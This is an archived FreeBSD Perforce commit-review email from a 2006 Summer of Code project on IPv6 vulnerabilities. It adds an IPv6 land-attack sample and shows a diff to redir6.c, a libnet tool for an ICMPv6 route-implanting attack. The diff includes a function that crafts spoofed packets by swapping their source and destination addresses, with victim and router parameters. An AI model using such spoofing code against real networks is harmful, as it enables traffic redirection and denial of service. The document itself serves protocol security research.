Date: Sat, 1 Jul 2006 14:21:12 GMT From: Clément Lecigne <clem1@FreeBSD.org> To: Perforce Change Reviews <perforce@FreeBSD.org> Subject: PERFORCE change 100396 for review Message-ID: <200607011421.k61ELCDD087685@repoman.freebsd.org>
next in thread | raw e-mail | index | archive | help
http://perforce.freebsd.org/chv.cgi?CH=100396 Change 100396 by clem1@clem1_ipv6vulns on 2006/07/01 14:20:17 land6.c - implementation of the IPv4 land attack. KAME is not vulnerable. Some improvements around redir6.c. Affected files ... .. //depot/projects/soc2006/clem1_ipv6vulns/libnet/sample/land6.c#1 add .. //depot/projects/soc2006/clem1_ipv6vulns/libnet/sample/redir6.c#2 edit Differences ... ==== //depot/projects/soc2006/clem1_ipv6vulns/libnet/sample/redir6.c#2 (text+ko) ==== @@ -3,6 +3,7 @@ * Implementation of the route implanting attack by Vanhauser * using icmp6 echo request and redirect message. * + * Copyright (c) 2006 Clément Lecigne <clem1@FreeBSD.org> * Copyright (c) 1998 - 2001 Mike D. Schiffman <mike@infonexus.com> * All rights reserved. * @@ -38,6 +39,7 @@ void redir6(char *, int , struct libnet_in6_addr, struct libnet_in6_addr, struct libnet_in6_addr, struct libnet_in6_addr, char *, char *); void usage(char *); +void inverse(char *); int main(int ac, char **av) @@ -160,7 +162,8 @@ } pkt = libnet_dump_packet(l); - + inverse(pkt + LIBNET_ETH_H); + libnet_destroy(l); usleep(TIMEWAIT); @@ -236,7 +239,40 @@ libnet_destroy(l); } - + +/* + * inverse src and dsp ip in ipv6 header. + * replace echo request type by echo reply type. + * renew the hop limit. + */ +void inverse(char *pkt){ + char tmp[16]; + + /* + * make sure that pkt starts with an ipv6 header. + */ + if (pkt[0] & 0xf != 6) + { + fprintf(stdout, "%s(): packet does not start with an ipv6 header\n", __func__); + exit(EXIT_FAILURE); + } + + /* restore source */ + memcpy(tmp, pkt + 8, 16); + /* erase ip6 source with ip6 dest */ + memcpy(pkt + 8, pkt + 24, 16); + /* erase ip6 dst with saved ip6 source */ + memcpy(pkt + 24, tmp, 16); + /* renew hl */ + pkt[7] = 255; + /* icmp type */ + pkt[40] = ICMP6_ECHOREPLY; + + /* + * XXX: checksum recalculation. + */ + return; +} void usage(char *prog){ fprintf(stdout, "usage: %s -a attack-ip -v victim-ip -r router-ip -d dest-ip"
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?200607011421.k61ELCDD087685>